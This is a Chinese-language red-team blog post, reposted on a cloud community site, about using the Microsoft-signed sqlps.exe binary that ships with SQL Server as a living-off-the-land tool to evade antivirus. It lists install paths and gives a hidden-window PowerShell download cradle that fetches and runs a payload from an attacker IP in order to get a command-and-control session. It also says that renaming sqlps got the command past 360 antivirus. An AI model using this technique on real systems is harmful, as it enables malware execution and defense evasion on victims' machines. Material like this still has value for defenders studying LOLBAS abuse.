免杀| sqlps白文件利用

举报
亿人安全 发表于 2023/05/31 23:58:05 2023/05/31
【摘要】 title: sqlps白文件利用date: 2022-12-15 12:30:02tags: - 免杀 - 白文件categories: - 免杀comments: true环境win10mssql:2017环境安装:参考:https://mp.weixin.qq.com/s?__biz=MzA4MjU4MTg2Ng==&mid=2247488389&idx=2&sn=2258bac04...
title: sqlps白文件利用
date: 2022-12-15 12:30:02
tags:
 - 免杀
 - 白文件
categories: 
 - 免杀
comments: true

环境win10

mssql:2017

环境安装:

参考:https://mp.weixin.qq.com/s?__biz=MzA4MjU4MTg2Ng==&mid=2247488389&idx=2&sn=2258bac044b8bae614afced1fb582d1e&chksm=9f82d380a8f55a96ab3ace7ed5df392e89e8338eec4d15dd2b34f8ba5bbdf67dc31bdddd59d0&scene=21#wechat_redirect

sqlps介绍

sqlps是mssql 安装后附带的一个具有Microsoft签名的二进制文件,可以用来加载一些命令 直接执行会发现是powershell


文件位置位于:

路径:

  • C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe

  • C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe

  • C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe

  • C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

  • C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe

Microsoft SQL Server\100 和 110 是 Powershell v2。Microsoft SQL Server\120 和 130 是 Powershell 版本 4。在 SQL Server 2016 中被 SQLToolsPS.exe 取代,但出于兼容性原因将包含在安装中。

此文件没有依赖 可以单独提出来在没有sql server的机器里面运行

利用此文件来进行上线

直接执行:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.150.127.128:80/a'))"

然后用sqlps执行


360:

进行绕过


这里是换了一种加载powershell命令的方式和重命名了sqlps文件来进行的绕过 方式肯定很多 就不一一列举了

参考:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/#execute

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。